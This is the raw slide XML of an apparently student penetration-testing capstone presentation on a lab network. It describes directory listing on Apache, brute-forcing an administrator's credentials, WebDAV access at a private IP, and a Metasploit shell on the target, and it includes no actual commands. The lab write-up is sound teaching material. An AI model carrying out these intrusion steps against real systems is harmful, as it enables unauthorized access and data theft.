                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ML-REFVM-684427</a:t>
                      </a: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AU"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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Gateway</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3" name="Google Shape;1083;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1085" name="Google Shape;1085;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1262146230"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="361507" y="1183053"/>
          <a:ext cx="8520223" cy="2407830"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{22C2846D-6DAD-4640-8CFD-54061075D8CE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2652327">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2933948">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2933948">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334482">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617527">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Improper Limitation of a</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Pathname to a Restricted Directory</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" i="1"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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attacker can gain access to sensitive and system information on the system, delete or modify files. The maximum impact depends on the functionality of the application.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" i="1"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2255207478"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617527">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory listing enabled on apache web server</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AU" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Able to use browser to read full contents of directories on capstone apache web server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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AU" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>File revealed user ashton is the administrator for the directory:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/company_folders/secret_folder/ </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3" name="Google Shape;1083;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1085" name="Google Shape;1085;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1529189684"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="418214" y="1183053"/>
          <a:ext cx="8463516" cy="2407860"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{22C2846D-6DAD-4640-8CFD-54061075D8CE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2771364">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2846076">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2846076">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334482">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617527">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Credential Cracking</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">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latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute force, dictionary (word list) and guessing attacks used against authentication processes of the application to identify valid account credentials.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200"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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Credential stuffing and credential cracking are the primary methods hackers use to accomplish account takeover—the unlawful accessing of a user account to commit fraud.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-AU" sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute force provided access to:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/secret_folder/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Password hash for Ashton </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Dev://192.168.1.105/webdav/</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"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1771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3" name="Google Shape;1083;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1085" name="Google Shape;1085;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399574751"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="430306" y="1183051"/>
          <a:ext cx="8399345" cy="2224950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{22C2846D-6DAD-4640-8CFD-54061075D8CE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2794659">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2802343">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2802343">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="37730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28480">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDav Vulnerability</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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The website contains information that ashton has control of the secret folder.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"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0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Slack-Lato"/>
                        </a:rPr>
                        <a:t>This gives a hacker the information that Ashton’s credentials will give access to the secret folder.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"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1036003">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Metasploit</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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Enable to listening into the target machine via a payload.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dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Established a shell to the targeted machine and able to navigate file directories and obtain system information of the target machine.</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27228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TotalTime>
  <Words>1917</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>286</Paragraphs>
  <Slides>34</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Slack-Lato</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Perpetua</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Improper Limitation of a Pathname to a Restricted </vt:lpstr>
      <vt:lpstr>Exploitation: Directory Listing Enabled on Apache</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploitation: Weak Password &amp; No Failed Password Lockout</vt:lpstr>
      <vt:lpstr>Exploitation: Open ports Vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Conclusion</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Appendix</vt:lpstr>
      <vt:lpstr>Code/Command used for : Finding the Hidden Directory</vt:lpstr>
      <vt:lpstr>Code/Command used for : Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Code/Command used for for: webdav vulnerability attack</vt:lpstr>
      <vt:lpstr>Code/Command used for: Metasploit attack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61450</dc:creator>
  <cp:lastModifiedBy>Md Iftakher Hossain</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-10T11:12:09Z</dcterms:modified>
</cp:coreProperties>
</file>